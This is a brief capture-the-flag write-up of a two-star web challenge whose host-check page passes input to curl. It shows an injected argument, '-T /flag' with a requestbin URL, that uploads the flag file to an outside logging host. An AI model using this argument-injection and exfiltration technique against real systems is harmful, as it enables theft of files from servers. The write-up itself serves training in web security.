CAAS is a web-based challenge with a difficulty of two stars,
The website is used to verify the status of a host, it uses the curl command. My first impression was it might be SSRF but I remembered that we can send files using curl, but I was not sure so I did some research.
Yep, we can upload files using the curl command, I spun up a request bin instance and sent the file,
ip = -T /flag http://requestbin.net/r/<id>
We can find the flag in the request bin logs.